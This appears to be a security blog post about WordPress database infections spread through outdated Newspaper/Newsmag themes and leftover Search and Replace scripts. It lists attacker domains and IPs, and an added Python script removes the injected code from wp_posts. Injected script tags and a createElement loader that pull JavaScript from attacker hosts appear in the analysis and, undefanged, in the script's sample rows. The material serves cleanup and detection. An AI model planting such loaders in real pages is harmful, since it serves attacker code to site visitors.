Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data
Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in outdated versions of tagDiv’s Newspaper/Newsmag themes or in abandoned copies of InterconnectIT’s Search and Replace script (searchreplacedb2.php) left on web servers.
The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.
Typical injected scripts look like this:
<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'>
Or:
var t = document.createElement("script");
t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
document.head.appendChild(t);
The most noticeable malicious URLs that we’ve seen lately are:
- con1.sometimesfree[.]biz/c.js (185.82.217.166 Bulgaria)
- java.sometimesfree[.]biz/counter.js (185.82.217.166 Bulgaria)
- javascript.sometimesfree[.]biz/script.js (185.82.217.166 Bulgaria)
- js.givemealetter[.]biz/script.js (185.82.217.166 Bulgaria)
- go.givemealetter[.]biz/click.html (185.82.217.166 Bulgaria)
- traffictrade[.]life/scripts.js (200.7.105.43 United Kingdom)
- blue.traffictrade[.]life/main.js (200.7.105.43 United Kingdom)
- js.trysomethingnew[.]eu/analytics.js (94.156.144.19 Bulgaria)
- get.simplefunsite[.]info/rw.js (does not resolve at the time of writing)
- post.simplefunsite[.]info/go.php?rewrite=81 (does not resolve at the time of writing)
- src.dancewithme[.]biz/src.js (185.159.82.2 Russia)
- go.dancewithme[.]biz/red.php (185.159.82.2 Russia)
They are all new domains registered specifically for this attack:
- traffictrade[.]life – created on July 3rd, 2017
- trysomethingnew[.]eu – created on August 11th, 2017
- sometimesfree[.]biz – created on August 22nd, 2017
- givemealetter[.]biz – created on August 27th, 2017
- simplefunsite[.]info – created on September 2nd, 2017
- dancewithme[.]biz – created on September 5th, 2017
Malware in WordPress Database
In most cases the scripts are injected right before <a href tags in the post content (the post_content column of the wp_posts table), so a webmaster may have to remove several injected scripts from each of hundreds of posts in the database – definitely not a task you want to do by hand!
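One way to do that cleanup in bulk, as an added example rather than code from the original post or from Sucuri: find the posts that reference any of the domains listed above, strip only the <script> elements that point at those domains, and write the cleaned post_content back. The script uses an in-memory SQLite copy of wp_posts with constructed sample rows so it runs offline; against a real site you would point the same two queries at MySQL (LIKE and parameter binding work identically there) after taking a database backup. The domain list comes from the indicators above with the [.] defanging removed, and the example.com links and post bodies are made up for the demo. Because post_content is plain HTML rather than serialized PHP data, a straight string rewrite is safe here.

```python
"""Bulk removal of injected <script> elements from wp_posts.post_content.

Added example, not the original article's or Sucuri's code. The domains
are the indicators listed in the article (defanging removed); the sample
posts and the in-memory SQLite stand-in for MySQL are assumptions."""
import re
import sqlite3

# Domains from the indicator list above, with "[.]" turned back into "."
MALICIOUS_DOMAINS = (
    "sometimesfree.biz", "givemealetter.biz", "traffictrade.life",
    "trysomethingnew.eu", "simplefunsite.info", "dancewithme.biz",
)

# Any <script>...</script> element. This covers both injected forms seen
# above: the bare src= tag and the createElement loader, which arrives
# wrapped in an inline <script> block.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def strip_injected_scripts(html: str) -> tuple[str, int]:
    """Return (cleaned_html, number_removed).

    Only script elements that reference a listed domain are dropped, so a
    legitimate script in the same post survives."""
    removed = 0

    def drop_if_malicious(match: re.Match) -> str:
        nonlocal removed
        element = match.group(0).lower()
        if any(domain in element for domain in MALICIOUS_DOMAINS):
            removed += 1
            return ""
        return match.group(0)

    return SCRIPT_RE.sub(drop_if_malicious, html), removed


def find_candidate_posts(conn: sqlite3.Connection) -> list[int]:
    """IDs of posts whose content mentions a listed domain anywhere.

    LIKE is only a cheap first pass: it also flags a post that merely talks
    about the domain in its text, so the regex above makes the decision.
    The WHERE clause is built from the constant tuple; user data is bound."""
    clauses = " OR ".join("post_content LIKE ?" for _ in MALICIOUS_DOMAINS)
    params = [f"%{d}%" for d in MALICIOUS_DOMAINS]
    rows = conn.execute(
        f"SELECT ID FROM wp_posts WHERE {clauses} ORDER BY ID", params
    ).fetchall()
    return [r[0] for r in rows]


def clean_posts(conn: sqlite3.Connection) -> dict[int, int]:
    """Strip injected scripts from every candidate post; returns ID -> count.

    Posts with a count of 0 still mention a domain and deserve a manual look."""
    results = {}
    for post_id in find_candidate_posts(conn):
        (content,) = conn.execute(
            "SELECT post_content FROM wp_posts WHERE ID = ?", (post_id,)
        ).fetchone()
        cleaned, n = strip_injected_scripts(content)
        if n:
            conn.execute(
                "UPDATE wp_posts SET post_content = ? WHERE ID = ?",
                (cleaned, post_id),
            )
        results[post_id] = n
    conn.commit()
    return results


# Constructed sample rows standing in for wp_posts on an infected site.
SAMPLE_POSTS = {
    1: ("<p>Read more "
        "<script type='text/javascript' src='https://con1.sometimesfree.biz/c.js'></script>"
        "<a href=\"https://example.com/one\">here</a> and "
        "<script type='text/javascript' src='https://js.givemealetter.biz/script.js'></script>"
        "<a href=\"https://example.com/two\">there</a>.</p>"),
    2: ("<p>Intro</p><script>var t = document.createElement(\"script\");\n"
        "t.type = \"text/javascript\"; t.src = \"https://src.dancewithme.biz/src.js\";\n"
        "document.head.appendChild(t);</script>"
        "<a href=\"https://example.com/three\">link</a>"),
    3: ("<p>Clean post</p><script src=\"https://example.com/legit.js\"></script>"
        "<a href=\"https://example.com/four\">ok</a>"),
    4: "<p>Note to self: block traffictrade.life at the firewall.</p>",
}


def build_demo_db() -> sqlite3.Connection:
    """In-memory wp_posts with just the two columns the cleanup touches."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_content TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?)", SAMPLE_POSTS.items())
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_demo_db()
    print("candidates before:", find_candidate_posts(db))
    print("removed per post:", clean_posts(db))
    print("still mentioning a domain:", find_candidate_posts(db))
```

Running it leaves post 3 and its legitimate script untouched, removes two injections from post 1 and the loader from post 2, and reports post 4 with a count of 0, which is the case to review by eye rather than auto-clean. Re-run find_candidate_posts after cleaning to confirm nothing but such mentions remain.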